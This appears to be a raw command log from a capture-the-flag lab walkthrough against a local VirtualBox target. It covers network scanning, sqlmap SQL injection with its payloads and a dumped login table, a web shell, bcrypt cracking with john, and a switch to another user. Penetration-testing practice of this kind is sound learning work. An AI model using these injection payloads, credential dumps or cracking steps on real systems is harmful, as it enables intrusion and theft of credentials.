❯ sudo arp-scan -l [sudo] password for Pepster: Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100 Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.60.1 00:50:56:c0:00:08 VMware, Inc. 192.168.60.2 00:50:56:e3:f6:57 VMware, Inc. 192.168.60.168 08:00:27:c5:86:bc PCS Systemtechnik GmbH 192.168.60.254 00:50:56:e0:65:b2 VMware, Inc.
4 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.10.0: 256 hosts scanned in 2.064 seconds (124.03 hosts/sec). 4 responded ❯ export ip=192.168.60.168 ❯ rustscan -a $ip .----. .-. .-. .----..---. .----. .---. .--. .-. .-. | {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| | | .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ | `-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-' The Modern Day Port Scanner. ________________________________________ : http://discord.skerritt.blog : : https://github.com/RustScan/RustScan : -------------------------------------- RustScan: Because guessing isn't hacking.
[~] The config file is expected to be at "/home/Pepster/.rustscan.toml" [!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers [!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. Open 192.168.60.168:22 Open 192.168.60.168:80 Open 192.168.60.168:8080 [~] Starting Script(s) [~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-31 16:30 CST Initiating ARP Ping Scan at 16:30 Scanning 192.168.60.168 [1 port] Completed ARP Ping Scan at 16:30, 0.06s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 16:30 Completed Parallel DNS resolution of 1 host. at 16:30, 0.01s elapsed DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0] Initiating SYN Stealth Scan at 16:30 Scanning 192.168.60.168 [3 ports] Discovered open port 80/tcp on 192.168.60.168 Discovered open port 8080/tcp on 192.168.60.168 Discovered open port 22/tcp on 192.168.60.168 Completed SYN Stealth Scan at 16:30, 0.05s elapsed (3 total ports) Nmap scan report for 192.168.60.168 Host is up, received arp-response (0.00043s latency). Scanned at 2025-01-31 16:30:22 CST for 0s PORT STATE SERVICE REASON 22/tcp open ssh syn-ack ttl 64 80/tcp open http syn-ack ttl 64 8080/tcp open http-proxy syn-ack ttl 64 MAC Address: 08:00:27:C5:86:BC (Oracle VirtualBox virtual NIC) Read data files from: /usr/share/nmap Nmap done: 1 IP address (1 host up) scanned in 0.31 seconds Raw packets sent: 4 (160B) | Rcvd: 4 (160B)
❯ sqlmap -u "http://192.168.60.168:8080/search.php?query=" --batch -D FlatPress -T login --dump ___ __H__ ___ ___[']_____ ___ ___ {1.8.12#stable} |_ -| . [,] | .'| . | |___|_ ["]_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 16:58:17 /2025-01-31/ [16:58:17] [WARNING] provided value for parameter 'query' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly [16:58:17] [INFO] resuming back-end DBMS 'mysql' [16:58:17] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: query (GET) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: query=' AND (SELECT 6584 FROM (SELECT(SLEEP(5)))xQes) AND 'IrcU'='IrcU Type: UNION query Title: Generic UNION query (NULL) - 5 columns Payload: query=' UNION ALL SELECT CONCAT(0x71786b7671,0x52545875617474437a52685277445446484e557661614c4a6143585949734c6b62714d674b6a7156,0x71706a7071),NULL,NULL,NULL,NULL-- - --- [16:58:17] [INFO] the back-end DBMS is MySQL web server operating system: Linux Debian web application technology: Apache 2.4.62 back-end DBMS: MySQL >= 5.0.12 (MariaDB fork) [16:58:17] [INFO] fetching columns for table 'login' in database 'FlatPress' [16:58:17] [INFO] fetching entries for table 'login' in database 'FlatPress' Database: FlatPress Table: login [1 entry] +----+--------+-----------------------+ | id | user | password | +----+--------+-----------------------+ | 1 | r0dgar | SNIETbkGBCnhFqeUJuqBO | +----+--------+-----------------------+ [16:58:17] [INFO] table 'FlatPress.login' dumped to CSV file '/home/Pepster/.local/share/sqlmap/output/192.168.60.168/dump/FlatPress/login.csv' [16:58:17] [INFO] fetched data logged to text files under '/home/Pepster/.local/share/sqlmap/output/192.168.60.168' [*] ending @ 16:58:17 /2025-01-31/
(remote) www-data@TheHackersLabs-Base:/home/flate$ cd /opt/ (remote) www-data@TheHackersLabs-Base:/opt$ ls hash.txt (remote) www-data@TheHackersLabs-Base:/opt$ cat hash.txt $2b$12$Qq75yQ3G.ydG2nxr4LzAPeJ6GE8po1NtjOAGZ2l1aIGa5//I5J/Xq ---------------------分隔--------------------- ❯ vim hash ❯ john hash --wordlist=/usr/share/wordlists/rockyou.txt Using default input encoding: UTF-8 Loaded 1 password hash (bcrypt [Blowfish 32/64 X3]) Cost 1 (iteration count) is 4096 for all loaded hashes Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status secret (?) 1g 0:00:00:01 DONE (2025-01-31 17:32) 0.8264g/s 59.50p/s 59.50c/s 59.50C/s justin..666666 Use the "--show" option to display all of the cracked passwords reliably Session completed.
adm用户组
切换用户
1 2 3 4 5
(remote) www-data@TheHackersLabs-Base:/home$ su pedro Password: pedro@TheHackersLabs-Base:/tmp$ id uid=1001(pedro) gid=1001(pedro) grupos=1001(pedro),4(adm)
